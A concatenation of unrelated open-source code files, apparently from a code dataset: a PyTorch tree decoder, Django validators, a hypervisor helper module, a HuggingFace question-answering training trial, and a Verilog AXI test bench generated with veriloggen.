self.ptr = nn.Linear(ptr_size, 1)
self.rnn = self._build_rnn(
rnn_type=rnn_type,
input_size=output_size,
emb_size=dec_emb_size,
hidden_size=dec_hidden_size,
dropout_input=dropout_for_decoder,
use_sibling=use_sibling,
)
def _run_forward_pass(
self,
graph_node_embedding,
graph_node_mask,
rnn_node_embedding,
graph_level_embedding,
graph_edge_embedding=None,
graph_edge_mask=None,
tgt_tree_batch=None,
enc_batch=None,
oov_dict=None,
):
r"""
The private calculation method for decoder.
Parameters
----------
enc_batch : torch.Tensor,
The input batch : (Batch_size * Source sentence word index tensor).
tgt_tree_batch:
The target tree to generate : consists of (Batch_size * Tree object),
each node in a Tree object is either a word index or a children Tree object.
graph_node_embedding: torch.Tensor,
The graph node embedding matrix of shape :math:`(B, N, D_{in})`
graph_node_mask: torch.Tensor,
The graph node type mask matrix of shape :math`(B, N)`
rnn_node_embedding: torch.Tensor,
The rnn encoded embedding matrix of shape :math`(B, N, D_{in})`
graph_level_embedding: torch.Tensor,
graph level embedding of shape :math`(B, D_{in})`
graph_edge_embedding: torch.Tensor,
graph edge embedding of shape :math`(B, N, D_{in})`
graph_edge_mask: torch.Tensor,
graph edge type embedding
oov_dict: dict,
vocab dict used in copy mechanism to incorporate some new words which
have never appeared in vocab for input sentences in training set.
"""
tgt_batch_size = len(tgt_tree_batch)
enc_outputs = graph_node_embedding
device = graph_node_embedding.device
if graph_level_embedding is None:
if self.graph_pooling_strategy == "max":
graph_level_embedding = torch.max(graph_node_embedding, 1)[0]
elif self.graph_pooling_strategy == "min":
graph_level_embedding = torch.min(graph_node_embedding, 1)[0]
elif self.graph_pooling_strategy == "mean":
graph_level_embedding = torch.mean(graph_node_embedding, 1)
else:
raise NotImplementedError()
graph_cell_state = graph_level_embedding
graph_hidden_state = graph_level_embedding
else:
graph_cell_state, graph_hidden_state = graph_level_embedding
# rnn_node_embedding = torch.zeros_like(graph_node_embedding,
# requires_grad=False).to(device)
cur_index = 1
loss = 0
dec_batch, queue_tree, max_index = get_dec_batch(
tgt_tree_batch, tgt_batch_size, device, self.tgt_vocab
)
dec_state = {}
for i in range(self.max_dec_tree_depth + 1):
dec_state[i] = {}
for j in range(self.max_dec_seq_length + 1):
dec_state[i][j] = {}
while cur_index <= max_index:
if cur_index > self.max_dec_tree_depth:
break
for j in range(1, 3):
dec_state[cur_index][0][j] = torch.zeros(
(tgt_batch_size, self.rnn_size), dtype=torch.float, requires_grad=False
).to(device)
sibling_state = torch.zeros(
(tgt_batch_size, self.rnn_size), dtype=torch.float, requires_grad=False
).to(device)
# with torch.no_grad():
if cur_index == 1:
for i in range(tgt_batch_size):
dec_state[1][0][1][i, :] = graph_cell_state[i]
dec_state[1][0][2][i, :] = graph_hidden_state[i]
else:
for i in range(1, tgt_batch_size + 1):
if cur_index <= len(queue_tree[i]):
par_index = queue_tree[i][cur_index - 1]["parent"]
child_index = queue_tree[i][cur_index - 1]["child_index"]
dec_state[cur_index][0][1][i - 1, :] = dec_state[par_index][child_index][1][
i - 1, :
]
dec_state[cur_index][0][2][i - 1, :] = dec_state[par_index][child_index][2][
i - 1, :
]
flag_sibling = False
for q_index in range(len(queue_tree[i])):
if (
(cur_index <= len(queue_tree[i]))
and (q_index < cur_index - 1)
and (
queue_tree[i][q_index]["parent"]
== queue_tree[i][cur_index - 1]["parent"]
)
and (
queue_tree[i][q_index]["child_index"]
< queue_tree[i][cur_index - 1]["child_index"]
)
):
flag_sibling = True
sibling_index = q_index
if flag_sibling:
sibling_state[i - 1, :] = dec_state[sibling_index][
dec_batch[sibling_index].size(1) - 1
][2][i - 1, :]
parent_h = dec_state[cur_index][0][2]
pred = None
for i in range(dec_batch[cur_index].size(1) - 1):
teacher_force = random.random() < self.teacher_force_ratio
if teacher_force is not True and i > 0:
input_word = pred.argmax(1)
else:
input_word = dec_batch[cur_index][:, i]
pred, rnn_state_iter, attn_scores = self.decode_step(
tgt_batch_size=tgt_batch_size,
dec_single_input=input_word,
dec_single_state=(dec_state[cur_index][i][1], dec_state[cur_index][i][2]),
memory=enc_outputs,
parent_state=parent_h,
oov_dict=oov_dict,
enc_batch=enc_batch,
)
dec_state[cur_index][i + 1][1], dec_state[cur_index][i + 1][2] = rnn_state_iter
pred = torch.log(pred + 1e-31)
loss += self.criterion(pred, dec_batch[cur_index][:, i + 1])
cur_index = cur_index + 1
loss = loss / tgt_batch_size
return loss
def _filter_oov(self, tokens, vocab):
r"""The function used to mask some oov word in word embedding layer."""
ret = tokens.clone()
ret[tokens >= vocab.vocab_size] = vocab.get_symbol_idx(vocab.unk_token)
return ret
def decode_step(
self,
tgt_batch_size,
dec_single_input,
dec_single_state,
memory,
parent_state,
input_mask=None,
memory_mask=None,
memory_candidate=None,
sibling_state=None,
oov_dict=None,
enc_batch=None,
):
"""The decoding function in tree decoder.
Parameters
----------
tgt_batch_size : int,
batch size.
dec_single_input : torch.Tensor,
word id matrix for decoder input: [B, N].
dec_single_state : torch.Tensor
the rnn decoding hidden state: [B, N, D].
memory : torch.Tensor
the encoder output node embedding.
parent_state : torch.Tensor
the parent embedding used in parent feeding mechanism.
input_mask : torch.Tensor, optional
input mask, by default None
memory_mask : torch.Tensor, optional
mask for encoder output, by default None
memory_candidate : torch.Tensor, optional
encoder output used for separate attention mechanism, by default None
sibling_state : torch.Tensor, optional
sibling state for sibling feeding mechanism, by default None
oov_dict : object, optional
out-of-vocabulary object for copy mechanism, by default None
enc_batch : torch.Tensor,
The input batch : (Batch_size * Source sentence word index tensor).
"""
device = memory.device
dec_single_input = self._filter_oov(dec_single_input, self.tgt_vocab)
rnn_state_c, rnn_state_h, dec_emb = self.rnn(
dec_single_input, dec_single_state[0], dec_single_state[1], parent_state, sibling_state
)
attn_collect = []
score_collect = []
if self.separate_attn:
pass
else:
context_vector, attn_scores = self.attention(query=rnn_state_h, memory=memory)
attn_collect.append(context_vector)
score_collect.append(attn_scores)
pred = F.tanh(self.linear_att(torch.cat((context_vector, rnn_state_h), 1)))
decoder_output = self.linear_out(self.dropout_attn(pred))
if self.use_copy:
assert enc_batch is not None
assert oov_dict is not None
output = torch.zeros(tgt_batch_size, oov_dict.vocab_size).to(device)
attn_ptr = torch.cat(attn_collect, dim=-1)
pgen_collect = [dec_emb, torch.cat((rnn_state_c, rnn_state_h), -1), attn_ptr]
prob_ptr = torch.sigmoid(self.ptr(torch.cat(pgen_collect, -1)))
prob_gen = 1 - prob_ptr
gen_output = torch.softmax(decoder_output, dim=-1)
ret = prob_gen * gen_output
need_pad_length = len(oov_dict) - len(self.tgt_vocab)
output = torch.cat((ret, ret.new_zeros((tgt_batch_size, need_pad_length))), dim=1)
# output[:, :self.tgt_vocab.vocab_size] = ret
ptr_output = attn_scores
output.scatter_add_(1, enc_batch, prob_ptr * ptr_output)
decoder_output = output
# decoder_output = -F.threshold(-output, -1.0, -1.0)
else:
decoder_output = torch.softmax(decoder_output, dim=-1)
return decoder_output, (rnn_state_c, rnn_state_h), attn_scores
def _build_rnn(self, rnn_type, input_size, emb_size, hidden_size, dropout_input, use_sibling):
"""_build_rnn : how the rnn unit should be build."""
rnn = TreeDecodingUnit(
input_size, emb_size, hidden_size, dropout_input, use_sibling, self.embeddings
)
return rnn
def forward(self, g, tgt_tree_batch=None, oov_dict=None):
params = self._extract_params(g)
params["tgt_tree_batch"] = tgt_tree_batch
params["oov_dict"] = oov_dict
return self._run_forward_pass(**params)
def _extract_params(self, graph_list):
"""
Parameters
----------
g: GraphData
Returns
-------
params: dict
"""
batch_data_dict = graph_list.batch_node_features
graph_node_emb = batch_data_dict["node_emb"]
# [s_g.node_features["node_emb"] for s_g in graph_list]
rnn_node_emb = batch_data_dict["rnn_emb"]
graph_node_mask = (batch_data_dict["token_id"] != 0).squeeze(-1).float() - 1
if self.use_copy:
src_seq_ret = graph_list.batch_node_features["token_id_oov"]
else:
src_seq_ret = None
return {
"graph_node_embedding": graph_node_emb,
"graph_node_mask": graph_node_mask,
"rnn_node_embedding": rnn_node_emb,
"graph_level_embedding": None,
"graph_edge_embedding": None,
"graph_edge_mask": None,
"enc_batch": src_seq_ret.long() if self.use_copy else None,
}
def create_mask(x, N, device=None):
x = x.data
mask = np.zeros((x.size(0), N))
for i in range(x.size(0)):
mask[i, : x[i]] = 1
return torch.Tensor(mask).to(device)
class TreeDecodingUnit(nn.Module):
def __init__(
self, input_size, emb_size, hidden_size, dropout_input, use_sibling, dec_embeddings
):
super(TreeDecodingUnit, self).__init__()
self.hidden_size = hidden_size
self.emb_size = emb_size
self.embedding = dec_embeddings
self.dropout = nn.Dropout(dropout_input)
self.lstm = nn.LSTMCell(emb_size + hidden_size * (2 if use_sibling else 1), hidden_size)
self.use_sibling = use_sibling
def forward(self, input_src, prev_c, prev_h, parent_h, sibling_state):
src_emb = self.embedding(input_src)
src_emb = self.dropout(src_emb)
if self.use_sibling:
input_single_step = torch.cat((src_emb, parent_h, sibling_state), 1)
else:
input_single_step = torch.cat((src_emb, parent_h), 1)
prev_cy, prev_hy = self.lstm(input_single_step, (prev_c, prev_h))
return prev_cy, prev_hy, input_single_step
def get_dec_batch(dec_tree_batch, batch_size, device, form_manager):
queue_tree = {}
for i in range(1, batch_size + 1):
queue_tree[i] = []
queue_tree[i].append({"tree": dec_tree_batch[i - 1], "parent": 0, "child_index": 1})
cur_index, max_index = 1, 1
dec_batch = {}
# max_index: the max number of sequence decoder in one batch
while cur_index <= max_index:
max_w_len = -1
batch_w_list = []
for i in range(1, batch_size + 1):
w_list = []
if cur_index <= len(queue_tree[i]):
t = queue_tree[i][cur_index - 1]["tree"]
for ic in range(t.num_children):
if isinstance(t.children[ic], Tree):
w_list.append(4)
queue_tree[i].append(
{"tree": t.children[ic], "parent": cur_index, "child_index": ic + 1}
)
else:
w_list.append(t.children[ic])
if len(queue_tree[i]) > max_index:
max_index = len(queue_tree[i])
if len(w_list) > max_w_len:
max_w_len = len(w_list)
batch_w_list.append(w_list)
dec_batch[cur_index] = torch.zeros((batch_size, max_w_len + 2), dtype=torch.long)
for i in range(batch_size):
w_list = batch_w_list[i]
if len(w_list) > 0:
for j in range(len(w_list)):
dec_batch[cur_index][i][j + 1] = w_list[j]
# add <S>, <E>
if cur_index == 1:
dec_batch[cur_index][i][0] = 1
else:
dec_batch[cur_index][i][0] = form_manager.get_symbol_idx("(")
dec_batch[cur_index][i][len(w_list) + 1] = 2
dec_batch[cur_index] = to_cuda(dec_batch[cur_index], device)
cur_index += 1
return dec_batch, queue_tree, max_index
|
crowdsourcing/validators/utils.py
|
AKSHANSH47/crowdsource-platform2
| 138 |
88538
|
<filename>crowdsourcing/validators/utils.py
from __future__ import unicode_literals
from django.utils.translation import ugettext_lazy as _
from rest_framework.exceptions import ValidationError
class EqualityValidator(object):
message = _('The fields {field_names} must be equal.')
missing_message = _('This field is required.')
def __init__(self, fields, message=None):
self.fields = fields
self.serializer_field = None
self.message = message or self.message
self.instance = None
self.initial_data = None
self.validate_non_fields = False
def set_context(self, serializer):
"""
This hook is called by the serializer instance,
prior to the validation call being made.
"""
self.instance = getattr(serializer, 'instance', None)
self.initial_data = getattr(serializer, 'initial_data', None)
self.validate_non_fields = getattr(serializer, 'validate_non_fields', False)
def __call__(self, *args, **kwargs):
if self.validate_non_fields:
if self.fields[0] not in self.initial_data or self.fields[1] not in self.initial_data:
raise ValidationError("Both fields are required.")
if self.initial_data.get(self.fields[0], 'Password1') != self.initial_data.get(self.fields[1],
'Password2'):
field_names = ', '.join(self.fields)
raise ValidationError(self.message.format(field_names=field_names))
class LengthValidator(object):
message = _('Field {field_name} must be at least {length} characters long.')
missing_message = _('Field {field_name} is required.')
def __init__(self, field, length, message=None):
self.field = field
self.length = length
self.serializer_field = None
self.message = message or self.message
self.initial_data = None
self.validate_non_fields = False
def set_context(self, serializer):
self.initial_data = getattr(serializer, 'initial_data', None)
self.validate_non_fields = getattr(serializer, 'validate_non_fields', False)
def __call__(self, *args, **kwargs):
if self.validate_non_fields:
if self.field not in self.initial_data:
raise ValidationError(self.missing_message.format(field_name=self.field))
if len(self.initial_data[self.field]) < self.length:
raise ValidationError(self.message.format(field_name=self.field, length=self.length))
class InequalityValidator(object):
message = _('Field {field_name} must be {field_operator} than {field_value}.')
def __init__(self, field, value, operator, message=None):
self.field = field
self.value = value
self.operator = 'gt'
self.message = message or self.message
self.initial_data = None
def set_context(self, serializer):
self.initial_data = getattr(serializer, 'initial_data', None)
def __call__(self, *args, **kwargs):
if self.initial_data[self.field] >= self.value and self.operator == 'lt':
raise ValidationError(self.message.format(field_name=self.field,
field_operator='less', field_value=self.value))
elif self.initial_data[self.field] <= self.value and self.operator == 'gt':
raise ValidationError(self.message.format(field_name=self.field,
field_operator='greater', field_value=self.value))
class ConditionallyRequiredValidator(object):
message = _('Field {field2_name} is required because {field_name} is {type_value}.')
def __init__(self, field, value, field2, message=None):
self.field = field
self.value = value
self.field2 = field2
self.message = message or self.message
self.initial_data = None
def set_context(self, serializer):
self.initial_data = getattr(serializer, 'initial_data', None)
def __call__(self, *args, **kwargs):
if self.initial_data[self.field] == self.value and self.field2 not in self.initial_data:
raise ValidationError(self.message.format(field_name=self.field, field2_name=self.field2,
type_value=self.value))
|
plugins/hypervisors/ovm/src/main/scripts/vm/hypervisor/ovm/OvmCommonModule.py
|
ycyun/ablestack-cloud
| 1,131 |
88569
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
'''
Created on May 17, 2011
'''
try:
import json
except ImportError:
import simplejson as json
from OvmObjectModule import *
import types
import logging
import popen2
import subprocess
from OvmFaultConstants import toErrCode, dispatchErrCode, NoVmFoundException, ShellExceutedFailedException
from xmlrpclib import Fault as XmlRpcFault
from OVSCommons import *
from OvmLoggerModule import OvmLogger
from OVSXXenStore import xen_get_vm_path
from OVSSiteRMServer import get_master_ip
HEARTBEAT_TIMESTAMP_FORMAT='<timestamp>%s</timestamp>'
HEARTBEAT_TIMESTAMP_PATTERN='(\<timestamp\>\d+.\d+<\/timestamp\>)'
HEARTBEAT_DIR='heart_beat'
ETC_HOSTS='/etc/hosts'
HOSTNAME_FILE='/etc/sysconfig/network'
OWNER_FILE_PREFIX='host_'
OCFS2_CONF='/etc/ocfs2/cluster.conf'
logger = OvmLogger('OvmCommon')
def setAttrFromDict(obj, name, refDict, convertFunc=None):
if not convertFunc:
setattr(obj, name, refDict[name])
else:
setattr(obj, name, convertFunc(refDict[name]))
def safeSetAttr(obj, name, value):
if not hasattr(obj, name): raise Exception("%s doesn't have attribute %s"%(obj.__class__.__name__, name))
setattr(obj, name, value)
def toAscii(jstr):
return str(jstr).encode('ascii', 'ignore')
def toAsciiHook(dct):
for k in dct:
v = dct[k]
if type(v) is types.UnicodeType:
v = toAscii(v)
del dct[k]
k = toAscii(k)
dct[k] = v
return dct
def asciiLoads(jStr):
jStr = str(jStr).replace("'", '"').replace('False', 'false').replace('True', 'true')
return json.loads(jStr, object_hook=toAsciiHook)
def exceptionIfNoSuccess(str, errMsg=None):
if not errMsg: errMsg = str
if not "success" in str: raise Exception("%s (%s)"%(errMsg, str))
def successToMap(str, sep=';'):
if not str.startswith("success"): raise Exception(str)
str = str[len('success:'):]
dct = {}
for pair in str.split(sep):
(key, value) = pair.split('=', 1)
dct[key] = value
return dct
def jsonSuccessToMap(str):
dct = json.loads(str)
if dct['status'] != 'SUCC': raise Exception(str)
return dct['value']
def safeDictSet(obj, dct, name):
if not hasattr(obj, name): raise Exception("%s has no attribute %s for encoding"%(obj.__class__.__name__, name))
dct[name] = getattr(obj, name)
def normalizeToGson(str):
return str.replace('\\', '').strip('"').replace('"{', '{').replace('}"', '}');
def toGson(obj):
return normalizeToGson(json.dumps(obj))
def MtoBytes(M):
return M * 1024 * 1024
def BytesToM(bytes):
return bytes/(1024*1024)
def BytesToG(bytes):
return bytes/(1024*1024*1024)
def runCmd(cmds):
process = subprocess.Popen(cmds, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
if process.returncode != 0:
raise ShellExceutedFailedException(stderr, process.returncode)
return stdout
def doCmd(lst):
cmds = [str(i) for i in lst]
cmdStr = ' '.join(cmds)
logger.debug(doCmd, cmdStr)
res = runCmd(cmdStr)
logger.debug(doCmd, 'result:' + res)
return res
def execute(cmd):
p = popen2.Popen3(cmd, True)
if (p.wait() != 0):
raise Exception("Failed to execute command. Command: " + cmd + ", Error: " + p.childerr.read())
return p.fromchild.read()
def getDomId(vm_name):
return execute("xm list | grep " + vm_name + " | awk '{print $2}'").strip()
def raiseExceptionIfFail(res):
if not "success" in res and not "SUCC" in res: raise Exception(res)
def ipToHeartBeatFileName(ip):
return ip.replace('.', '_') + "_HEARTBEAT"
def getVmNameFromConfigureFile(cfgPath):
fd = open(cfgPath)
for i in fd.readlines():
i = i.strip()
if i.startswith('name'):
(key, value) = i.split("=", 1)
value = value.strip().strip("'")
fd.close()
return value
fd.close()
raise Exception('Cannot find vm name in %s'%cfgPath)
def makeOwnerFileName():
hostIp = successToMap(get_master_ip())['ip']
ownerFileName = OWNER_FILE_PREFIX + hostIp.replace('.', '_')
return ownerFileName
|
model_hub/examples/huggingface/question-answering/qa_beam_search_trial.py
|
shiyuann/determined
| 1,729 |
88586
|
<filename>model_hub/examples/huggingface/question-answering/qa_beam_search_trial.py
"""
This example is largely based on the question-answering example in the huggingface
transformers library. The license for the transformer's library is reproduced below.
==================================================================================================
Copyright 2020 The HuggingFace Team. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import functools
import logging
from typing import Dict, Union
import attrdict
import data_beam_search
import datasets
import qa_utils
import torch
import transformers
import determined.pytorch as det_torch
import model_hub.huggingface as hf
class QABeamSearchTrial(hf.BaseTransformerTrial):
def __init__(self, context: det_torch.PyTorchTrialContext) -> None:
self.logger = logging.getLogger(__name__)
self.hparams = attrdict.AttrDict(context.get_hparams())
self.data_config = attrdict.AttrDict(context.get_data_config())
self.context = context
# Check to make sure the dataset is configured correctly.
if self.data_config.dataset_name is not None:
dataset_name = self.data_config.dataset_name
if dataset_name == "squad":
assert (
not self.data_config.version_2_with_negative
), "version_2_with_negative should be false for squad"
elif dataset_name == "squad_v2":
assert (
self.data_config.version_2_with_negative
), "version_2_with_negative should be true for squad_v2"
self.data_processors = data_beam_search
# Get the datasets: you can either provide your own CSV or JSON training and evaluation
# files (see below) or just provide the name of one of the public datasets available on the
# hub at https://huggingface.co/datasets/ (the dataset will be downloaded automatically
# from the datasets Hub).
# For CSV/JSON files, this script will use the column called 'text' or the first column if
# no column called 'text' is found. You can easily tweak this behavior (see below).
# See more about loading any type of standard or custom dataset (from files, python dict,
# pandas DataFrame, etc) at
# https://huggingface.co/docs/datasets/loading_datasets.html.
self.raw_datasets = hf.default_load_dataset(self.data_config)
self.column_names = self.raw_datasets["train"].column_names
# For beam search, we need to use a different model from the default model returned by
# AutoModelForQuestionAnswering. We will use a custom init in this case that is a slight
# modification of the BaseTransformerTrial init method.
self.exp_config = attrdict.AttrDict(context.get_experiment_config())
# Check to make sure all expected hyperparameters are set.
self.check_hparams()
# Parse hparams and data_config.
(
self.config_kwargs,
self.tokenizer_kwargs,
self.model_kwargs,
) = hf.default_parse_config_tokenizer_model_kwargs(self.hparams)
optimizer_kwargs, scheduler_kwargs = hf.default_parse_optimizer_lr_scheduler_kwargs(
self.hparams
)
self.config = transformers.XLNetConfig.from_pretrained(**self.config_kwargs)
self.tokenizer = transformers.XLNetTokenizerFast.from_pretrained(**self.tokenizer_kwargs)
# We need to use XLNetForQuestionAnswering instead of XLNetForQuestionAnsweringSimple
# which is the default returned by AutoModelForQuestionAnswering.
if self.hparams.use_pretrained_weights:
self.model_kwargs["config"] = self.config
self.model = transformers.XLNetForQuestionAnswering.from_pretrained(**self.model_kwargs)
else:
self.model = transformers.XLNetForQuestionAnswering(self.config)
self.model = self.context.wrap_model(self.model)
# The rest is the same as the parent init method.
self.optimizer = self.context.wrap_optimizer(
hf.build_default_optimizer(self.model, optimizer_kwargs)
)
if self.hparams.use_apex_amp:
self.model, self.optimizer = self.context.configure_apex_amp(
models=self.model,
optimizers=self.optimizer,
)
self.lr_scheduler = self.context.wrap_lr_scheduler(
hf.build_default_lr_scheduler(self.optimizer, scheduler_kwargs),
det_torch.LRScheduler.StepMode.STEP_EVERY_BATCH,
)
self.grad_clip_fn = (
lambda x: torch.nn.utils.clip_grad_norm_(x, optimizer_kwargs.max_grad_norm)
if optimizer_kwargs.max_grad_norm > 0 # type: ignore
else None
)
self.logger.info(self.config)
if not isinstance(self.tokenizer, transformers.PreTrainedTokenizerFast):
raise ValueError(
"This example script only works for models that have a fast tokenizer. Checkout "
"the big table of models at "
"https://huggingface.co/transformers/index.html#bigtable to find the model types "
"that meet this requirement"
)
# We need to create the tokenized dataset after init because we need to model and
# tokenizer to be available.
self.tokenized_datasets = self.build_datasets()
train_length = len(self.tokenized_datasets["train"])
self.logger.info("training records: {}".format(train_length))
if (
"records_per_epoch" in self.exp_config
and train_length != self.exp_config["records_per_epoch"]
):
self.logger.warning(
"number of train records {} does not match records_per_epoch of {}".format(
train_length, self.exp_config["records_per_epoch"]
)
)
# Create metric reducer
metric = datasets.load_metric(
"squad_v2" if self.data_config.version_2_with_negative else "squad"
)
self.reducer = context.experimental.wrap_reducer(
functools.partial(
qa_utils.compute_metrics,
self.data_config,
self.column_names,
self.data_processors.post_processing_function,
self.raw_datasets,
self.tokenized_datasets,
self.model,
metric,
),
for_training=False,
)
def build_datasets(self) -> Dict[str, Union[datasets.Dataset, datasets.DatasetDict]]:
tokenized_datasets = {}
for split in ["train", "validation"]:
tokenized_datasets[split] = self.raw_datasets[split].map(
functools.partial(
self.data_processors.prepare_features,
split,
self.data_config,
self.tokenizer,
self.column_names,
),
batched=True,
num_proc=self.data_config.preprocessing_num_workers,
remove_columns=self.column_names,
load_from_cache_file=not self.data_config.overwrite_cache,
)
hf.remove_unused_columns(self.model, tokenized_datasets[split])
if self.data_config.pad_to_max_length:
self.collator = transformers.default_data_collator
else:
collator = transformers.DataCollatorWithPadding(
self.tokenizer, pad_to_multiple_of=8 if self.hparams.use_apex_amp else None
)
self.collator = lambda x: collator(x).data
return tokenized_datasets
def build_training_data_loader(self) -> det_torch.DataLoader:
return det_torch.DataLoader(
self.tokenized_datasets["train"],
batch_size=self.context.get_per_slot_batch_size(),
collate_fn=self.collator,
)
def build_validation_data_loader(self) -> det_torch.DataLoader:
# Determined's distributed batch sampler interleaves shards on each GPU slot so
# sample i goes to worker with rank i % world_size. Therefore, we need to re-sort
# all the samples once we gather the predictions before computing the validation metric.
return det_torch.DataLoader(
qa_utils.DatasetWithIndex(self.tokenized_datasets["validation"]),
batch_size=self.context.get_per_slot_batch_size(),
collate_fn=self.collator,
)
def evaluate_batch(self, batch: det_torch.TorchData, batch_idx: int) -> Dict:
ind = batch.pop("ind")
outputs = self.model(**batch)
if isinstance(outputs, dict):
predictions = tuple(
v.detach().cpu().numpy() for k, v in outputs.items() if k not in ("loss", "mems")
)
else:
predictions = outputs[1:].detach().cpu().numpy()
self.reducer.update((ind.detach().cpu().numpy(), predictions))
# Although we are returning the empty dictionary below, we will still get the metrics from
# custom reducer that we passed to the context during initialization.
return {}
|
frappe/modules/__init__.py
|
Don-Leopardo/frappe
| 3,755 |
88596
|
from .utils import *
|
tests/extension/types_/axi_/slave_readwrite_lite_simultaneous/test_types_axi_slave_readwrite_lite_simultaneous.py
|
jesseclin/veriloggen
| 232 |
88605
|
from __future__ import absolute_import
from __future__ import print_function
import veriloggen
import types_axi_slave_readwrite_lite_simultaneous
expected_verilog = """
module test;
reg CLK;
reg RST;
wire [32-1:0] sum;
reg [32-1:0] myaxi_awaddr;
reg [4-1:0] myaxi_awcache;
reg [3-1:0] myaxi_awprot;
reg myaxi_awvalid;
wire myaxi_awready;
reg [32-1:0] myaxi_wdata;
reg [4-1:0] myaxi_wstrb;
reg myaxi_wvalid;
wire myaxi_wready;
wire [2-1:0] myaxi_bresp;
wire myaxi_bvalid;
reg myaxi_bready;
reg [32-1:0] myaxi_araddr;
reg [4-1:0] myaxi_arcache;
reg [3-1:0] myaxi_arprot;
reg myaxi_arvalid;
wire myaxi_arready;
wire [32-1:0] myaxi_rdata;
wire [2-1:0] myaxi_rresp;
wire myaxi_rvalid;
reg myaxi_rready;
reg [32-1:0] _axi_awaddr;
wire [4-1:0] _axi_awcache;
wire [3-1:0] _axi_awprot;
reg _axi_awvalid;
wire _axi_awready;
reg [32-1:0] _axi_wdata;
reg [4-1:0] _axi_wstrb;
reg _axi_wvalid;
wire _axi_wready;
wire [2-1:0] _axi_bresp;
wire _axi_bvalid;
wire _axi_bready;
reg [32-1:0] _axi_araddr;
wire [4-1:0] _axi_arcache;
wire [3-1:0] _axi_arprot;
reg _axi_arvalid;
wire _axi_arready;
wire [32-1:0] _axi_rdata;
wire [2-1:0] _axi_rresp;
wire _axi_rvalid;
wire _axi_rready;
assign _axi_awcache = 3;
assign _axi_awprot = 0;
assign _axi_bready = 1;
assign _axi_arcache = 3;
assign _axi_arprot = 0;
reg [3-1:0] outstanding_wcount_0;
wire [32-1:0] _tmp_1;
assign _tmp_1 = _axi_awaddr;
always @(*) begin
myaxi_awaddr = _tmp_1;
end
wire [4-1:0] _tmp_2;
assign _tmp_2 = _axi_awcache;
always @(*) begin
myaxi_awcache = _tmp_2;
end
wire [3-1:0] _tmp_3;
assign _tmp_3 = _axi_awprot;
always @(*) begin
myaxi_awprot = _tmp_3;
end
wire _tmp_4;
assign _tmp_4 = _axi_awvalid;
always @(*) begin
myaxi_awvalid = _tmp_4;
end
assign _axi_awready = myaxi_awready;
wire [32-1:0] _tmp_5;
assign _tmp_5 = _axi_wdata;
always @(*) begin
myaxi_wdata = _tmp_5;
end
wire [4-1:0] _tmp_6;
assign _tmp_6 = _axi_wstrb;
always @(*) begin
myaxi_wstrb = _tmp_6;
end
wire _tmp_7;
assign _tmp_7 = _axi_wvalid;
always @(*) begin
myaxi_wvalid = _tmp_7;
end
assign _axi_wready = myaxi_wready;
assign _axi_bresp = myaxi_bresp;
assign _axi_bvalid = myaxi_bvalid;
wire _tmp_8;
assign _tmp_8 = _axi_bready;
always @(*) begin
myaxi_bready = _tmp_8;
end
wire [32-1:0] _tmp_9;
assign _tmp_9 = _axi_araddr;
always @(*) begin
myaxi_araddr = _tmp_9;
end
wire [4-1:0] _tmp_10;
assign _tmp_10 = _axi_arcache;
always @(*) begin
myaxi_arcache = _tmp_10;
end
wire [3-1:0] _tmp_11;
assign _tmp_11 = _axi_arprot;
always @(*) begin
myaxi_arprot = _tmp_11;
end
wire _tmp_12;
assign _tmp_12 = _axi_arvalid;
always @(*) begin
myaxi_arvalid = _tmp_12;
end
assign _axi_arready = myaxi_arready;
assign _axi_rdata = myaxi_rdata;
assign _axi_rresp = myaxi_rresp;
assign _axi_rvalid = myaxi_rvalid;
wire _tmp_13;
assign _tmp_13 = _axi_rready;
always @(*) begin
myaxi_rready = _tmp_13;
end
reg [32-1:0] read_fsm;
localparam read_fsm_init = 0;
reg [32-1:0] rsum;
reg __axi_cond_0_1;
reg __axi_cond_1_1;
assign _axi_rready = (read_fsm == 1) || (read_fsm == 3);
reg [32-1:0] write_fsm;
localparam write_fsm_init = 0;
reg __axi_cond_2_1;
reg [32-1:0] wdata;
reg __axi_cond_3_1;
reg __axi_cond_4_1;
reg __axi_cond_5_1;
main
uut
(
.CLK(CLK),
.RST(RST),
.sum(sum),
.myaxi_awaddr(myaxi_awaddr),
.myaxi_awcache(myaxi_awcache),
.myaxi_awprot(myaxi_awprot),
.myaxi_awvalid(myaxi_awvalid),
.myaxi_awready(myaxi_awready),
.myaxi_wdata(myaxi_wdata),
.myaxi_wstrb(myaxi_wstrb),
.myaxi_wvalid(myaxi_wvalid),
.myaxi_wready(myaxi_wready),
.myaxi_bresp(myaxi_bresp),
.myaxi_bvalid(myaxi_bvalid),
.myaxi_bready(myaxi_bready),
.myaxi_araddr(myaxi_araddr),
.myaxi_arcache(myaxi_arcache),
.myaxi_arprot(myaxi_arprot),
.myaxi_arvalid(myaxi_arvalid),
.myaxi_arready(myaxi_arready),
.myaxi_rdata(myaxi_rdata),
.myaxi_rresp(myaxi_rresp),
.myaxi_rvalid(myaxi_rvalid),
.myaxi_rready(myaxi_rready)
);
initial begin
CLK = 0;
forever begin
#5 CLK = !CLK;
end
end
initial begin
RST = 0;
_axi_awaddr = 0;
_axi_awvalid = 0;
_axi_wdata = 0;
_axi_wstrb = 0;
_axi_wvalid = 0;
_axi_araddr = 0;
_axi_arvalid = 0;
outstanding_wcount_0 = 0;
read_fsm = read_fsm_init;
rsum = 0;
__axi_cond_0_1 = 0;
__axi_cond_1_1 = 0;
write_fsm = write_fsm_init;
__axi_cond_2_1 = 0;
wdata = 100;
__axi_cond_3_1 = 0;
__axi_cond_4_1 = 0;
__axi_cond_5_1 = 0;
#100;
RST = 1;
#100;
RST = 0;
#100000;
$finish;
end
